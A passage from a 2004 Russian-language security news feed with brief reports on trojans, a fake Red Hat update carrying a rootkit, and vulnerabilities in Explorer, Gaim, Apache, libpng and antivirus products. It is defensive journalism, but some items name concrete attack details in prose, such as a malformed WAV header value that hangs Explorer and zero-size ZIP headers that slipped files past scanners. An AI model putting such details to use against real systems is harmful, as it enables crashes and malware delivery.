26/10/2004 13:50 Анализ кода, который предлагалось скачать в поддельном бюллетене от Red Hat
Господа из французской группы K-OTik Security Research & Survey провели аудит кода руткита, который предлагалось скачать с сайта fedora-redhat.com (естественно, тоже подложного). В сообщении сообщалось, что обновление якобы латает уязвимость в утилитах ls и mkdir входящих в состав пакета fileutils. В результате проведённого исследования было выяснено, что руткит: создаёт пользователя "bash" без пароля (UID=GID=0), получает информацию об IP-адресе и времени работы системы (uptime), запускает демон SSHD (для обеспечения удалённого доступа со стороны), пересылает информацию на почтовый адрес root@addlebrain.com. Собственно, само тело руткита содержится в файле inst.c.
Анализ кода

26/10/2004 13:20 Новый троян Coiboa
Sophos сообщает об обнаружении новой вредоносной программы Coiboa. После проникновения на компьютер с Windows троян Coiboa создает на жестком диске свою копию с именем Regcxn.exe и добавляет ссылку на этот файл в реестр в ключи автозапуска. Далее Coiboa начинает шпионскую деятельность, регистрируя ввод с клавиатуры и периодически записывая скриншоты рабочего стола. Похищенная информация впоследствии отправляется автору. Подробное описание этой вредоносной программы, не получившей пока широкого распространения, можно найти на сайте Sophos.
Источники: compulenta.ru,sophos.com

26/10/2004 13:18 Троян Sens крадет информацию о пользователях Сети
Компания Symantec обнаружила новую вредоносную программу, получившую название Sens. После активации этот троян, заражающий компьютеры под управлением операционных систем Microsoft Windows, записывает на жесткий диск две свои копии с именами iat.dll, senss.exe и затем регистрируется в ключе автозапуска реестра. Далее Sens пытается отследить действия пользователя инфицированной машины при работе в Сети и отправить похищенные данные своему автору. Таким образом, в руках злоумышленников теоретически могут оказаться пароли, номера банковских счетов и прочая конфиденциальная информация. Впрочем, широкого распространения вредоносная программа пока не получила.
Источники: compulenta.ru,symantec.com

26/10/2004 13:15 Вирус I-worm.Mydoom.ab
"Лаборатория Касперского" сообщает, что в настоящее время в интернете активно распространяется новый вариант червя Mydoom. Обновление антивирусных баз, содержащее процедуры детектирования червя, было выпущено вчера. Опасность вирусной аттаки - средняя.
Лаборатория Касперского

26/10/2004 13:14 Недельный отчет о вирусах от Panda Software
Вышел очередной недельный отчет о вирусах от Panda Software. Сегодняшний отчет посвящен вирусам-червям Netsky.AH, Netsky.AI, Bagz.E, Mydoom.AD и Scranor.A и троянцу EMFTrojan.C.
Подробнее

26/10/2004 11:25 Уязвимость в MS Windows XP Explorer
Господа из группы HexView сообщают об обнаружении уязвимости в MS Windows XP Explorer при попытке просмотра специальным образом сформированного WAV-файла. Уязвимость скрыта в процедуре разбора заголовка подобного файла. В приведённом авторами примере в заголовке в строке, определяющей длину "fmt" (смещение от начала - 0x10) задано значение 0xFFFFFFFF (вместо стандартного значения 0x12). В результате при разборе подобного заголовка Explorer входит в бесконечный цикл с дальнейшим исчерпанием всех ресурсов и завешиванием всей системы.
Описание

26/10/2004 11:10 Уязвимость в Gaim
Internet Security Systems сообщает об обнаружении уязвимости в интернет-пейджере Gaim (существует как *nix, так и Windows-версии). Отправляя особым образом составленное сообщение MSN (Microsoft Network) SLP-cообщение, злоумышленник может вызвать переполнение буфера и выполнить произвольный код в системе сполномочиями пользователя, запустившего Gaim. Уязвимости подвержены версии Gaim до 1.02. Обновления выпущены производителем.
Описание

26/10/2004 10:57 Хакеры организовали фальшивую рассылку обновлений от имени дистрибьютора Linux
Один из дистрибьюторов операционной системы Linux - компания Red Hat - предупредил своих клиентов о появлении фальшивых сообщений о новой заплатке для этой версии ОС, сообщает сайт газеты Sydney Morning Herald. Согласно содержанию разосланного злоумышленниками электронного письма, патч предназначается "для устранения уязвимостей в файловых утилитах ls и mkdir, позволявших хакеру удаленно запускать произвольные коды". "Red Hat получила информацию о появлении электронных писем, написанных якобы от имени компании. Письма содержат рекомендации скачать и запустить обновление. Это фальшивое обновление, по-видимому, содержит вредоносный код. Официальные послания от Red Hat никогда не приходят без запроса. Мы отправляем свои письма с адреса secalert@redhat.com и удостоверяем их цифровой подписью", - говорится в комментарии дистрибьютора. Авторы фальшивых писем открыли свой сайт в домене fedora-redhat.com, который был зарегистрирован 24 октября. Настоящий сайт Red Hat находится в домене fedora.redhat.com.
Подробности

26/10/2004 10:45 Вирус Opener досаждает пользователям Мас
Впервые за долгое время появился тревожный сигнал о вирусе, который поражает компьютеры с операционной системой Apple OS X. Новый вирус, основанный на сценарии, который шпионит за пользователями Apple, был обнаружен в этот уикенд. Злонамеренный код, который в группах пользователей Мас прозвали Opener, блокирует встроенный брандмауэр Mac OS X, крадет персональную информацию и может искажать данные. Эксперты говорят, что подобные черты характерны для тысяч вирусов, нацеленных на вездесущую операционную систему Microsoft Windows, но в сообществе Apple Macintosh ни о чем подобном не слышали. Пол Даклин, главный технолог отделения Sophos в Азиатско-Тихоокеанском регионе, сказал ZDNet Australia, что вирус, который Sophos называет Renepo, поражает любые накопители Mac OS X, подсоединенные к зараженной системе, и делает компьютеры беззащитными перед другими хакерскими атаками. По словам Даклина, Opener блокирует встроенный брандмауэр Mac OS X, создает лазейку для автора вируса, который получает возможность дистанционно управлять компьютером, разыскивает любые пароли, хранящиеся на жестком диске, и загружает крекер паролей JohnTheRipper. Однако хуже всего то, что этот вирус может породить волну новых вирусов, обращающих функции сценариев Mac OS X против пользователей.
Подробности

26/10/2004 10:21 Ошибка в ядре Linux создает условия для DoS-атак
Баг, обнаруженный в версии 2.6 ядра Linux, позволяет удаленным пользователям выводить из строя системы с последней версией корпоративного и потребительского ПО SuSE. На прошлой неделе дистрибьютор Linux Novell SuSE распространил предупреждение с высоким рейтингом опасности — 9 по десятибалльной шкале, — в котором сообщается об ошибке в ядре Linux 2.6. Баг проявляется в корпоративных и потребительских продуктах компании — SuSE Linux Enterprise Server 9 и SuSE Linux Professional 9.1. Роман Драхтмюллер, отвечающий в SuSE Linux за безопасность Linux, говорит, что данная версия ядра доступна для всех дистрибьюторов Linux, однако SuSE — один из немногих коммерческих дистрибутивов, в которых действительно используется ядро 2.6, и им приходится быть первопроходцами в решении проблем безопасности. Сотрудник команды реагирования на секьюрити-инциденты Red Hat Марк Кокс сказал, что корпоративный продукт Red Hat, Red Hat Enterprise Linux, не подвержен влиянию обнаруженного дефекта, так как в нем применяется версия ядра 2.4. Ошибка позволяет злоумышленнику дистанционно вывести из строя ПК, на котором установлен один из указанных продуктов SuSE и брандмауэр, отправив по его адресу специально сформированный IP-пакет. SuSE рекомендует пользователям запретить опции логгинга пакетов IP и TCP в брандмауэре и обновить ядро. В версии 2.6.8 ядра Linux этот баг исправлен, как и в последней версии 2.6.9, которая вышла на прошлой неделе.
Сообщение SuSE

26/10/2004 09:47 В США впервые осужден распространитель "шпионских программ"
В США федеральным судом был впервые осужден спамер и распространитель так называемых "шпионских программ" (spyware), известный под именем "Spam King" ("король спама"), его настоящее имя Стэнфорд Уоллес (Stanford Wallace). Суд в штате Нью-Гемпшир обязал его прекратить работу программ, установленных фирмами Уоллеса на компьютеры многочисленных пользователей Интернета, сообщает Associated Press. Накануне парламентом США был принят специальный закон, предусматривающий ответственность за создание и распространение "шпионских программ". Такие программы являются, по сути, разновидностью компьютерных вирусов, однако они не наносят целенаправленнный ущерб, а занимаются принудительным показом рекламы (в частности, во всплывающих окнах браузера) и отслеживанием походов пользователя по Интернету. Федеральная торговая комиссия (FTC) США считает распространение подобных инструментов неправомерным и преследует их авторов. Уоллес - спамер со стажем и в прошлом занимался также массовыми почтовыми рассылками, за что и получил свое прозвище. В последнее время он занимался распространением spyware, для чего создал компании SmartBot.net и Seismic Entertainment. Кроме непосредственно распространения, компании также за 30 долларов продавали пользователям утилиты для очистки компьютеров от "шпионских программ" - эксперты FTC заявляют, что на самом деле они не выполняли эту функцию (в то же время, существуют программы, реально предназначенные для лечения от spyware - например, SpyBot).
Lenta.Ru

25/10/2004 19:36 В интернет-пейджере Gaim найдена дыра
В интернет-пейджере Gaim обнаружена опасная уязвимость. Дыра теоретически может использоваться злоумышленниками с целью выполнения на удаленном компьютере произвольного вредоносного кода. Для реализации нападения необходимо отправить жертве последовательность сформированных особым образом MSN (Microsoft Network) SLP пакетов, обработка которых приведет к возникновению ошибки переполнения буфера. Брешь присутствует в программе Gaim версий 0.79-1.0.1.
Источник

25/10/2004 19:29 "Лаборатория Касперского" устраняет уязвимость антивирусного сканирования архивированных файлов
Ошибка в системах антивирусного сканирования архивов формата ZIP предоставляла вирусописателям возможность дезориентации систем антивирусной защиты. Уязвимость была обнаружена компанией iDefence, специализирующейся в области электронной безопасности, и затрагивает антивирусные продукты ведущих разработчиков, включая McAfee, Computer Associates, Kaspersky, Sophos, Eset и RAV. Дело в том, что информация о реальном размере находящихся в ZIP-архиве файлов хранится в двух заголовках (local и global header). Если злоумышленник в обоих заголовках укажет значение размера какого-либо файла равным нулю, то антивирусные сканеры указанных выше разработчиков ошибочно посчитают такой обьект слишком маленьким для проверки и пропустят его. "Обнаруженная iDefence уязвимость методики антивирусного сканирования архивов ZIP-формата предоставляла потенциальную возможность дезориентации систем антивирусной защиты за счет изменения данных, содержащихся в заголовке архива. Антивирусные эксперты "Лаборатории Касперского" оперативно устранили найденную ошибку, вызванную несоответствием механизмов работы архиватора ZIP и антивирусного сканера", - сказал Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского". "Теперь при анализе архивированного объекта антивирусный сканер полностью повторяет действия архиватора, сначала распаковывая файл, и только затем подвергая его анализу.
kaspersky.ru

25/10/2004 19:24 Уязвимости в Java для мобильников
Как сообщает dl на bugtraq.ru, польский исследователь Адам Говдяк (Adam Gowdiak) сообщил о них Sun еще в августе. Используя их, он создал программу, способную без ведома пользователя отсылать текстовые сообщения, очищать память телефона, соединяться с Internet, воровать записи из телефонной книги. Sun обещала разослать патч компаниям-производителям телефонов в течение двух недель, предпочтя не сообщать об уязвимостях конечным пользователям. По словам Говдяка, использовать их довольно затруднительно, поскольку, во-первых, программа, их использующая, должна быть привязана к конкретной модели телефона (у него ушло около четырех месяцев, чтобы сделать это для Nokia 6310i), а, во-вторых, она должна быть предварительно скачана и запущена пользователем. Впрочем, он считает, что не стоит недооценивать опасность, и лучше рассчитывать на то, что удаленные атаки на мобильные устройства будут разработаны в ближайшие полгода.
Источник

22/10/2004 19:09 Уязвимость в kpdf
Сообщается об уязвимости в во вьювере (вот уж слово) PDF-файлов в KDE - kpdf. Об этом сообщает Dirk Mueller от имени команды разработчиков проекта KDE (оконная система в мире открытых систем). Существует уязвимость целочисленных данных в xpdf и kpdf, использование которой при просмотре специального PDF-файла позволяет полностью загрузить процессор и привести к неработоспособности машины (до перезагрузки, естественно), а также к выполнению произвольного кода. Уязвимость связана с кодом обработки XRef. Патч доступен на сайте раработчиков.
Подробности

22/10/2004 15:29 Microsoft выпустит первое обновление SP1 к Windows Server 2003
Первый пакет исправлений ошибок и узявимостей в Windows Server 2003 — ServicePack 1 — будет выпущен Microsoft к концу текущего года. Помимо исправлений найденных ошибок, SP1 дополнит операционную систему мастером Security Configuration Wizard для настройки политик безопасности. «Эта утилита позволит, основываясь на политиках безопасности, более точно подключать протоколы, сервисы и возможности», — заявил менеджер продуктов Microsoft Windows Server Сэмм Дистасио (Samm DiStasio). «Мастер имеет возможность распространять политики и конфигурации на основе XML, установленные для одного из серверов, на сотни других, которые должны выполнять те же функции». ServicePack 1 не будет сильно отличаться от SP2 для Windows XP; различие между ними заключается в некоторых исправлених, написанных «специально для сервера», сказал г-н Дистасио. В ходе предварительного тестирования SP1 показал увеличение производительности SSL на 50% и 32-битных программ — на 17%, утверждает менеджер. Из других новостей корпорации: Windows Update Services выйдет к концу первого полугодия 2005 года, как и планировалось ранее, а первая бета-версия продукта появится в ноябре текущего года вместе с Windows Server 2003 для 64-битных платформ. В конце 2005 года выйдет версия Server 2003 для высокопроизводительных вычислений, а также выпуск 2 Windows Storage Server и первая бета-версия сервера Longhorn. Для совместной работы над ошибками и разработки технологий защиты Microsoft заключила соглашение с другой компанией, продукты которой также страдают от уязвимостей — Cisco Systems.
SecurityLab

22/10/2004 14:45 Уязвимость в libpng
В библиотеке обработки графических файлов libpng обнаружены уязвимости, связанные с некорректной обработкой границ функцией "png_handle_tRNS()" и целочисленным переполнением в функции "png_read_png()". Сформировав специальныйй PNG-файл, злоумышленник может выполнить произвольный код в системе. Для устранения уязвимости рекомендуется обновиться до версий 1.0.17 и 1.2.7.
Описание

22/10/2004 14:27 Уязвимость в Apache
Та же Secunia сообщает о том. что наш соотечественник Crazy Einstein обнаружил уязвимость в популярном Вэб-сервере Apache, наличие которой позволяет локальному пользователю повысить свои привилегии. Уязвимость связана с некорректной проверкой границ функцией "get_tag()" в модуле "mod_include". В результате при обработке специальным образом оформленного локального документа может возникнуть переполнение буфера. Однако для успешного проведения атаки необходимо, чтобы сервер был запущен с SSI (server-side includes). Уязвимость обнаружена в версии 1.3.31, в последней версии Apache 1.3.32 данная уязвимость устранена.
Описание

22/10/2004 12:28 Эксплореру SP2 не помеха
Как оказалось, браузер MS IE 6.0 сделан с таким далеко идущим запасом прочности, что никакой сервис-пак не помешает ему принять на борт вредоносный код, созданный талантливым хакером. Как сообщает TechWeb, датская компания Secunia, занимающаяся вопросами компьютерной безопасности, нашла в браузере MS IE 6.0 еще две дыры, позволяющие злоумышленникам атаковать компьютеры, работающие под управлением WinXP SP2. По данным Secunia, обе уязвимости являются "чрезвычайно опасными" и связаны с механизмом работы технологии drag-n-drop и системой "зонной защиты" браузера. Чтобы заразиться, пользователю достаточно всего лишь зайти на сайт-ловушку и проделать ряд простых операций со специально созданными файлами. Как обычно, компания рекомендует пользователям MS IE либо отключить средства ActiveX, либо перейти на более безопасную программу, поддерживающую те же функции. Например, на Mozilla Firefox.
Internet.Ru

22/10/2004 11:14 Очередная порция уязвимостей во многих браузерах
Jakob Balle из Secunia Research обнаружил уязвимости во многих браузерах, которые поддерживают так называемые "табы" (Tabs) - возможность открытия нескольких сайтов в одном окне браузера в различных подокнах (если попытаться сформулировать понятие "табы"). Суть двух уязвимостей сводится к тому, что страница, открывающаяся в другом табе, может вывести диалог, который будет воспринят пользователем как относящийся к активному табу. Разумеется, для этого страница должна быть оформлена соответствующим образом злоумышленником. К подобным табам относятся диалоги загрузки ("Download dialog" box) и т.н. "Prompt" box, формируемые при помощи JavaScript. Список "пострадавших" браузеров: Mozilla 1.7.3, Mozilla Firefox 0.10.1, Camino 0.8, Opera 7.54, Konqueror 3.2.2-6, Netscape 7.2, Avant Browser 9.02 build 101, Avant Browser 10.0 build 029, Maxthon (MyIE2) 1.1.039. В качестве временной меры советуют отключать JavaScript и не посещать подозрительные сайты.
Описание

22/10/2004 10:36 Выход sendmail X.0.0.PreAlpha16
На www.sendmail.org в свободном доступе появились исходники прототипа Sendmail X и документация, сообщает linux.org.ru. Беглое прочтение создает впечатление, что это совершенно другой MTA. Формат конфига "чем-то" напоминает named.conf от Bind. Упоминания sendmail.cf в приложении к Sendmail X не обнаружено. Система (оно теперь MTS) поделена на пять задач, каждая из которых работает под своим пользователем. root, похоже (и наконец), не используется совсем...
Подробности

22/10/2004 10:18 Поставщик ФБР наносит последние штрихи на безопасную Linux
Компания Trusted Computer Solutions, поставляющая надежные приложения таким организациям, как ФБР, создала безопасную версию Linux, которая выйдет весной 2005 года. В настоящее время TCS проводит бета-тестирование безопасной Linux, которая послужит заказчикам альтернативой Trusted Solaris в качестве платформы для их приложений. Компания разрабатывает программы, позволяющие безопасно обмениваться информацией. Операционный директор TCS Эдвард Гаммерсла рассказал ZDNet UK, что когда Министерству обороны Великобритании или НАТО требуются разведданные из США, они часто передаются при помощи ПО TCS. В круг заказчиков компании входят ФБР, Разведывательное управление Министерства обороны США и Управление военно-морской разведки США. Сейчас заказчики TCS могут исполнять свои приложения только на Trusted Solaris от Sun Microsystems, так как это единственная имеющаяся на рынке надежная операционная система. Чтобы предложить альтернативу Solaris, разработчики TCS создали специальную версию Linux, расширив функциональные возможности SELinux — версии Linux с повышенной степенью защиты, разработанной Агентством национальной безопасности США. Продукт должен пройти сертификацию по уровню CC-EAL4 (US Common Criteria Evaluation at Evaluation Assurance Level 4) — по словам Гаммерсла, такая сертификация обязательна, если TCS хочет продавать свои решения на Linux разведывательным организациям, и это не единственная проблема, которую предстоит решить. «Разведывательные агентства, прежде чем купить что-либо, должны пройти несколько уровней утверждения — что-то вроде олимпийской дистанции с 25 дополнительными неожиданными препятствиями». Операционная система Trusted Solaris может использоваться только на оборудовании Sun, тогда как Linux будет работать на разных аппаратных платформах, включая недорогие системы Dell и IBM.
Подробнее

22/10/2004 09:50 Английские фанаты взломали сайт швейцарского судьи и отомстили за "Евро-2004"
Фанаты сборной Англии по футболу взломали персональный сайт швейцарского арбитра Урса Майера (Urs Meier), который в четвертьфинальном матче минувшего чемпионата Европы по футболу не засчитал гол англичан в ворота сборной Португалии. Английские болельщики считают, что гол, который Майер не засчитал, зафиксировав нападение на вратаря, определил исход матча, в результате которого сборная Англии проиграла и выбыла из чемпионата. С тех пор Майер начал получать угрозы по электронной почте. Как сообщает Reuters, в четверг неизвестные злоумышленники взломали сайт Майера и разместили там от его имени сообщение, гласящее, что он признается в получении взятки от чиновника УЕФА для того, чтобы в турнире осталась Португалия, и теперь он сожалеет о содеянном и подает в отставку. Настороженность посетителей сайта вызвало то, что объявление было написано на английском языке, в то время, как весь сайт написан на немецком. Впоследствии сам Майер в интервью местной газете Blick опроверг свою отставку, сказав, что он шокирован и думал, что история с незасчитанным голом давно забыта. В настоящее время сайт восстановил свой изначальный вид.
Lenta.Ru

21/10/2004 12:40 В Москве устанавливают таксофоны с выходом в Интернет
Компания "Московская городская телефонная сеть" (МГТС) представила на открывшейся накануне в пяти городах России выставке "ИнфоКом-2004" новую модель стационарного таксофона, который обладает возможностями по работе с Интернетом. С помощью этого телефона можно отправлять и получать электронную почту, отправлять SMS-собщения, кроме того, аппарат оборудован цифровой камерой. Десять подобных аппаратов уже установлено в Москве. В частности, как передает РИА "Новости", их можно найти в Российской экономической академии имени Плеханова, в Центральном доме туриста, Российском университете дружбы народов, а также на Павелецком вокзале. Оплачивать предоставляемые с помощью таксофона услуги можно посредством карт МГТС, кредитных банковских карт и социальных карт москвича.
Lenta.Ru

21/10/2004 11:43 Paragon адаптируется к Windows Mobile 2003 SE
Компания Paragon Software продолжает адаптацию своих разработок к новой на рынке КПК операционной системе Windows Mobile 2003 Second Edition. В частности, уже адаптирована технология распознавания рукописного ввода PenReader, причем новая версия учитывает все технологические и идеологические особенности новой ОС. Кроме того, в ближайшее время планируется выпуск новых версий системы оперативного полноэкранного распознавания рукописного ввода PenReader 2005 для Tablet PC и Pocket PC, поддерживающих слитное распознавание текста и имеющих модуль лексической коррекции ввода. Также выпущена универсальная русская версия системы локализации LEng для Windows Mobile 2003 SE, которая поддерживает новую систему регистрации: в процессе установки программы пользователь может не вводить серийный номер, а продолжать установку в демонстрационном режиме.
Оттуда же

21/10/2004 10:31 Обман архивированием
Компания iDEFENSE объявила об ошибке, которая существует в некоторых антивирусах при обработке zip-архивов. Если нападающий отредактирует архивный файл так, чтобы в его метаданных вложенный файл имел нулевую длину, то он не пройдет проверку на вирусы. Этой ошибке подвержены антивирусы компаний McAfee, Computer Associates, "Лаборатория Касперского", Sophos, Eset и RAV. Исследователи сообщили о найденной ошибке во все антивирусные компании. "Лаборатория Касперского", в частности, уже сообщила, что для старых версий исправления появятся в кумулятивном обновлении, а в новой версии 5.0 исправления появятся в пакете исправлений, появление которого ожидается в октябре.
"Открытые системы"

21/10/2004 10:19 Расширены функциональные возможности Firebox Х Edge
Компания Rainbow Technologies сообщает об улучшении технических характеристик межсетевых экранов серии Firebox X Edge. В моделях Firebox X Edge 5/5w и Firebox X Edge 15/15w, обеспечивающих надёжную защиту мобильных пользователей с разделёнными домашней и рабочей сетями, удалённых офисов и предприятий малого бизнеса, увеличено без снижения производительности оборудования количество одновременно работающих пользователей. Теперь модель Firebox X Edge 5/5w может поддерживать до 12 (было до 5) пользователей, а Firebox X Edge 15/15w – до 30 (было до 15) пользователей. Firebox X Edge – аппаратно-программный комплекс защиты сетей предприятий малого бизнеса, удалённых офисов и мобильных пользователей. Интегрированные устройства защиты Firebox X Edge выполняют функции межсетевого экрана, построения VPN, обеспечения защиты беспроводного соединения, фильтрации по содержимому web-сайтов и управления с рабочих станций антивирусным ПО. Обеспечивая фильтрацию трафика и построение VPN, модели Firebox X Edge предоставляют более надёжную защиту сетей, чем устройства, использующие трансляцию сетевых адресов (NAT). Серия представлена тремя моделями – как для проводных, так и беспроводных сетей — Firebox X5/5w, Firebox X15/15w и Firebox X50/50w. Каждая модель Firebox X Edge обеспечивает более высокую пропускную способность, построение большего количества VPN-туннелей и поддержку большего количества сетевых интерфейсов, чем аналогичные устройства этого класса.
Сайт компании

20/10/2004 22:14 Эксплоит уязвимости Windows XP
Опубликован исходный код уязвимости в движке обработки графических файлов форматов Windows Metafile (WMF) и Enhanced Windows Metafile (EMF). Описана в бюллетене по безопасности MS04-032. Как пишет сам автор, уязвимость может быт использована в дальнейшем для просмотра содержимого директории, в которой содержится уязвимый файл, либо для просмотра самого файла. Написан для платформ win32, Linux (в зависимости от опций компиляции - поумолчанию, кстати, компилируется под Linux платформу). Тестировался против Internet Explorer 6.0 (SP1), Win XP SP1.
Эксплоит

20/10/2004 14:02 В Украине прекратили делегировать домены
ООО «Хостмастер», администратор украинского домена .ua, приостановил делегирование доменных имен в украинских доменах .ua и.com.ua. Как сообщил агентству «Интерфакс-Украина» директор «Хостмастера» Борис Мостовой, приостановка связана с возникновением разногласий: некоторые регистраторы настаивают на изменении текста договора при том, что в соответствии с правилами домена .ua его администратор обязан предоставлять всем регистраторам одинаковые условия. Не исключено, что приостановка делегирования доменов имеет под собой политическую подоплеку и связана с грядущими выборами президента Украины.
"Вебпланета"

20/10/2004 12:37 .masterhost будет тестировать свои виртуальные сервера
С 19-го октября текущего года все интернет-проекты, расположенные на виртуальных площадках .masterhost будут проверяться самым интеллектуальным в мире сканером XSpider компании Positive Technologies. Отчеты о результатах тестирования с указанием уязвимостей и рекомендациями по их ликвидации будут направляться электронными письмами владельцам интернет-проектов. Заинтересованным владельцам и арендаторам физических серверов, расположенных в дата-центре .masterhost, компания Positive Technologies предложит специальные цены на свои услуги. Большие канальные мощности и высококачественное оборудование на площадках .masterhost в сочетании с выполнением рекомендаций XSpider по защите от внешних вторжений, обеспечивают высочайшую надежность и бесперебойность работы интернет-проектов, расположенных в компании .masterhost!
Подробности

20/10/2004 12:25 Тотальный контроль над Wi-Fi
Компания Wavelink начала поставки Wavelink Managed Security, интегрированной платформы управления сетями IEEE 802.11x, сетевыми устройствами и безопасностью. Компонент, отвечающий за контроль над устройствами, разработан недавно приобретенной Wavelink фирмой AirPrism. Он позволяет с центральной консоли, руководствуясь политиками, уничтожать данные на удаленных мобильных и стационарных устройствах, а также блокировать их с целью выполнения операций резервного копирования данных или синхронизации с центральным сервером. Предусмотрена возможность восстановления сеанса передачи данных без его перезапуска после обрыва соединения. Имеется функция оптимизации связи с учетом доступной полосы пропускания и возможность прозрачного для пользователя переназначения IP-адреса. В состав пакета также включен Mobile Manager Authentication Server - RADIUS-сервер для аутентификации в беспроводных и кабельных сетях. Кроме того, в систему интегрирован клиентский компонент разработки фирмы Funk Software, обеспечивающий исполнение составленных администратором политик безопасности. Согласно лицензионному соглашению с компанией AirMagnet, в платформу интегрирована разработанная ею технология распознавания вторжений, базирующаяся на датчиках несанкционированных WLAN-устройств и программной системе инспекции пакетов на точках доступа.
"Открытые системы"

20/10/2004 12:14 Статистика компьютерной преступности в Украине
Негативные явления, связанные с информатизацией не обошли стороной и Украину, которая все увереннее входит в единое информационное пространство. Глобальная компьютеризация современного общества породила новую сферу общественных отношений, которая, к сожалению, нередко становится объектом противоправных действий. Среди наиболее опасных и распространенных компьютерных преступлений в Украине можно выделить следующие: распространение компьютерных вирусов, мошенничества с пластиковыми платежными карточками, хищение денежных средств с банковских счетов, хищение компьютерной информации и нарушение правил эксплуатации автоматизированных электронно-вычислительных систем. По данным Украинского Антивирусного Центра потери от вирусных атак в первом полугодии 2004 г. составили 290 миллионов гривен (около 45 млн. евро). По сравнению с аналогичным периодом 2003 года убытки выросли на 30%.
Crime-Research.ru

20/10/2004 11:51 В антивирусе Norton обнаружена "дыра"
Эксперт фирмы Secunia, специализирующейся в области ИТ-безопасности, Дэниел Милизик (Daniel Milisic) обнаружил уязвимость в Norton AntiVirus/Norton Internet Security от Symantec. Эксплуатируя данную уязвимость, пользователь, имеющий ограниченные права доступа, может отключить автоматическую защиту NAV/NIS, что при обычных условиях разрешено лишь администратору. Последствием отключения может стать загрузка из интернета и выполнение вредоносной программы, которая была бы перехвачена при работающей защите. Нарушение становится возможным из-за ошибки функций автоматической защиты, использующих определенный код, написанный на языке сценариев Visual Basic Script. Уязвимости подвержена как минимум версия Norton Internet Security 2004; на других системах проверка пока не проводилась. Эксперты Secunia советуют ограничить круг доступа к системе или установить другой антивирусный продукт, сообщается на сайте компании.
CNews

20/10/2004 11:34 Вышла русская версия Windows Media Player 10
Компания Microsoft выпустила на прошлой неделе русскую версию программы Windows Media Player 10. Этот новый медиаплеер от Microsoft предназначен исключительно для операционной системы Windows XP и является усовершенствованной девятой версией программы. Функционально русская версия полностью идентична английской, вышедшей 2 сентября. В интерфейсе плеера даже присутствуют средства доступа к онлайновым музыкальным магазинам, торгующим музыкой в формате WMA. В русской версии такие магазины почему-то названы интерактивными. Впрочем, с территории нашей страны их услуги пока недоступны. Так что толку от одной из главных новых функций медиаплеера от Microsoft немного, по крайней мере, пока. Воспользоваться ей получится только из США, Канады и немногих других стран, где музыка активно продается в онлайне. Помимо доступа к онлайновым музыкальным магазинам Windows Media Player 10 умеет напрямую работать с обширным набором портативных плееров и даже добавляет соответствующий пунктик в панель управления Windows. Однако самой полезной функцией программы стоит считать поддержку сжатия в формат MP3 с высокими битрейтами: от 128 до 320 кбит/с. Раньше поддержку MP3 в Media Player можно было назвать не иначе как номинальной из-за ограничений по битрейту. Разумеется. формат Windows Media Audio тоже на забыт, и именно он используется по умолчанию при копировании музыки с компакт-дисков.
Страница загрузки

20/10/2004 11:18 Microsoft: процесс "обрезания" продолжается
Microsoft продолжает отказываться от внедрения новых функций в разрабатываемых версиях операционных систем, сообщает "Компьюлента". В конце августа много шума наделало решение компании исключить один из ключевых компонентов операционной системы Longhorn - файловую систему WinFS. Теперь же появилась информация о том, что не все нововведения будут реализованы в Windows Server 2003 R2. Эта ОС была впервые продемонстрирована весной нынешнего года. Она представляет собой модернизированный вариант Windows Server 2003. Обновленная серверная версия Windows будет выпущена в 2005 году, и в Microsoft намерены выдержать эти сроки. Тем не менее, в состав Windows Server 2003 R2 не войдет такой важный компонент как набор инструментов Network Access Protection, для обеспечения сетевой безопасности. Как сообщает издание Microsoft Watch со ссылкой на менеджера Microsoft Сэмма Дистасио (Samm DiStasio), на такой шаг в компании пошли, поскольку внедрение Network Access Protection потребует слишком серьезных низкоуровневых изменений в системе. Большинство остальных нововведений в системе появятся. Большинство из них уже выпущены в виде дополнений к Windows Server 2003. Это такие компоненты как Active Directory Application Mode, SharePoint Services, Windows Update Services и другие. А система карантина для виртуальных частных сетей появится даже не в Windows Server 2003 R2, а в первом сервис-паке для Windows Server 2003, который выйдет в самом начале 2005 года. Эта система позволит диагностировать компьютеры в сети на предмет наличия дыр и в случае необходимости изолировать их.
Подробности

20/10/2004 10:46 Выход NMAP 3.75
На сайте Insecure.org сообщается о выходе новой версии самого, пожалуй, лучшего сканера NMAP. 18 октября выпущена версия 3.75, основные отличия которой заключаются в увеличении стабильности, исправлении ошибок и, естественно, в увеличении базу сигнатур определяемых ОС. База увеличилась практически на 20% и включает в себя уже 1353 записи. В частности, обновлены версии определяемых ОС: Linux - до 2.6.8; Windows - до XP SP2, включены сигнатуры варезных версий Longhorn; различные Xboxes; OpenBSD3.6; NetBSD до 2.0RC4; Novell Netware 6.5; FreeBSD 5.3-BETA и т.д. Добавлены новые IP-протоколы, утверждённые IANA. Также устранены различные баги, обнаруженный в версии 3.70.
Подробности

20/10/2004 10:22 Антивирус Касперского 5.5 для Novell Netware
"Лаборатория Касперского" сообщает о выпуске коммерческой версии Антивируса Касперского® 5.5 для Novell NetWare. Антивирус Касперского для Novell NetWare предназначен для организации антивирусной защиты файлового сервера, работающего на платформе Novell Netware. Характерной особенностью решения является механизм управления защитой сервера. Она основана на создании задач, отражающих всю антивирусную функциональность продукта. В настройках задачи администратор может указать область проверки, типы проверяемых объектов, действия с подозрительными и зараженными объектами, задать рассылку уведомлений и тип информации, заносимой в журнал отчета. Таким образом, достигается значительное упрощение процесса администрирования и настройки системы антивирусной безопасности за счет создания и запуска задач с индивидуально заданными параметрами обработки объектов. При работе Антивируса Касперского для Novell Netware запуск антивирусного ядра, осуществляющего проверку файлов на отсутствие вирусов, производится в защищенном адресном пространстве. Благодаря этому в случае нештатной ситуации, возникшей при проверке файла и вызвавшей сбой функционирования антивирусной защиты, не нарушается работоспособность сервера, что повышает надежность работы продукта и сервера в целом. Более того, при работе на многопроцессорных системах для увеличения производительности антивирусной защиты Антивирус Касперского для Novell Netware позволяет осуществить одновременный запуск и обеспечивать работу нескольких экземпляров антивирусного ядра, тем самым в полной мере используя преимущества распределенной обработки информации.
Подробности

20/10/2004 10:11 Власти США займутся регулированием интернет-телефонии
